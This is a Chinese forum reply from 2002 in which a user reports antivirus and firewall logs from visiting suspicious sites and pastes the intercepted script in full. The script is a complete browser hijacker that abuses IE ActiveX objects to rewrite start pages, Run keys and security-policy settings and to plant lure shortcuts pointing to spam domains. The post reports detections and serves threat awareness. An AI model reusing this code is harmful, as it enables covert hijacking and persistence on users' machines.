不好意思,呵呵~~~,刚才没有仔细去看网站,所以没有什么发现。经过我的测试,发现以下的一些东西,希望对你有帮助。在我的机子上,所有的东西都被拦截,没有受到破坏,天网没有任何反应,可能是因为它的防御侧重点不在这方面吧!但天网还是很不错的哦:)
PS:你是怎么找到这些网站的咯?个人觉得没什么意思,也许是以前看的太多啦吧,呵呵~~以下是实时监控的记录
FoundVirusTime:2002-08-19- 23:44
FileName

J18DJ18.L4.BIZCN[1].HTM
FilePath:C:\WINDOWS\TEMPORARY INTERNET FILES\CONTENT.IE5\FJCBTA8L
VirusName:script.exploit.spage.yuzia
Result:杀毒成功
FoundVirusTime:2002-08-19- 23:45
FileName:3[1].HTM
FilePath:C:\WINDOWS\TEMPORARY INTERNET FILES\CONTENT.IE5\OPQ5CP07
VirusName:Script.ActiveXComp.Expl.hf
Result:文件被删除
FoundVirusTime:2002-08-19- 23:45
FileName:3R[1].HTM
FilePath:C:\WINDOWS\TEMPORARY INTERNET FILES\CONTENT.IE5\B0JR3B80
VirusName:Script.ActiveXComp.Expl.hf
Result:文件被删除
FoundVirusTime:2002-08-19- 23:45
FileName:L[1].HTM
FilePath:C:\WINDOWS\TEMPORARY INTERNET FILES\CONTENT.IE5\SL2FKPI7
VirusName:Script.ActiveXComp.Expl.hf
Result:文件被删除
FoundVirusTime:2002-08-19- 23:45
FileName:LR[1].HTM
FilePath:C:\WINDOWS\TEMPORARY INTERNET FILES\CONTENT.IE5\QZRXQIVD
VirusName:Script.ActiveXComp.Expl.hf
Result:文件被删除
以下是瑞星防火墙的记录
Anti 'GoFriller' Trojan 202.99.67.11:1051->211.91.231.212:1394 TCP SYN+ACK 该数据包被成功拦截
Anti 'GoFriller' Trojan 202.99.67.11:1051->211.91.231.212:1394 TCP ACK 该数据包被成功拦截
Anti 'GoFriller' Trojan 202.99.67.11:1051->211.91.231.212:1394 TCP SYN+ACK 该数据包被成功拦截
Anti 'GoFriller' Trojan 202.99.67.11:1051->211.91.231.212:1394 TCP SYN+ACK 该数据包被成功拦截
这是被拦截下来的代码
当前正在执行的程序的名称和打开的文件的名称是:
"C:\Program Files\Internet Explorer\IEXPLORE.EXE"
*********************************************************************************************
可疑代码的动作如下:
有写注册表的动作
有利用IE漏洞的动作
有创建文件对象的动作
有创建 SHELL 对象的动作
*********************************************************************************************
可疑代码显示如下:
document.write(""
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL"

;
Shor.TargetPath = SiteURL;
Shor.Save();
}
function f(){
try
{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"

;
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try{
//if (document.cookie.indexOf("ChgLive") == -1)
//{
var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
document.cookie="ChgLive=general; expires=" + expdate.toGMTString() + "; path=/;"
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "http://www.qqsh.net/2");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.51cq.net");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.51cq.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Local Page", "http://www.51cq.net");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Local Page", "http://www.51cq.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url1","http://www.51cq.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url2","http://www.51cq.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url3","http://www.51cq.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url4","http://www.51cq.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Extensions\\{8DE0FCD4-5EB5-11D3-AD25-00002100131c}\\Icon","");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Extensions\\{8DE0FCD4-5EB5-11D3-AD25-00002100131c}\\ButtonText","Yahoo");
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\SecChangeSettings", "1");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Microsoft Internet Explorer-30000歌曲在线听www.mtv99.com");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Microsoft Internet Explorer-30000歌曲在线听www.mtv99.com");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\dbr", "http://www.51cq.net");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\arke", "http://www.51cq.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page", "http://www.51cq.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Default_Page_URL", "http://www.51cq.net");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Default_Page_URL", "http://www.51cq.net");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Search\\CustomizeSearch", "http://www.51cq.net");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Search\\SearchAssistant", "http://www.51cq.net");
//添加到IE右键菜单
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\MenuExt\\如何得到女孩QQ号码 :::>www.51cq.net\\", "c:\\WINDOWS\\TEMP\\syshlp.htm");
//添加到IE工具栏
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Extensions\\{8FBA04EE-3024-11D2-8F1F-0000F87ABD16}\\ButtonText", "找喜欢做爱的女孩");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Extensions\\{8FBA04EE-3024-11D2-8F1F-0000F87ABD16}\\CLSID", "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Extensions\\{8FBA04EE-3024-11D2-8F1F-0000F87ABD16}\\Default Visible", "Yes");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Extensions\\{8FBA04EE-3024-11D2-8F1F-0000F87ABD16}\\Exec", "http://www.51cq.net");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Extensions\\{8FBA04EE-3024-11D2-8F1F-0000F87ABD16}\\HotIcon", ",4");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Extensions\\{8FBA04EE-3024-11D2-8F1F-0000F87ABD16}\\Icon", ",4");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Extensions\\{8FBA04EE-3024-11D2-8F1F-0000F87ABD16}\\MenuText", "复原&IE选项(&I)");
var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
document.cookie="ChgLive=general; expires=" + expdate.toGMTString() + "; path=/;"
var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + "\\Favorites";
if(!FSO.FolderExists(loc)) {
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
if(!FSO.FolderExists(loc)) {
return;
}
}
AddFavLnk("c:\\windows\\Desktop", "网吧找女孩QQ","http://www.51cq.net");AddFavLnk("c:\\windows\\Desktop", "音乐在线3000首","http://www.51cq.com");
AddFavLnk("c:\\windows\\Start Menu", "找喜欢作爱的女孩", "http://www.51cq.net");AddFavLnk("c:\\windows\\Start Menu", "网吧得到女孩QQ号", "http://www.51cq.net");
AddFavLnk(loc, "哪种女孩最风骚", "http://www.51cq.net");
AddFavLnk(loc, "哪种女孩最风骚", "http://www.51cq.net");
AddFavLnk("C:\\WINDOWS\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch", "30000歌曲在线听", "http://www.51cq.net");
//}
}
catch(e){ }
}
catch(e){ }
}
function init(){
setTimeout("f()", 1000);
}
init();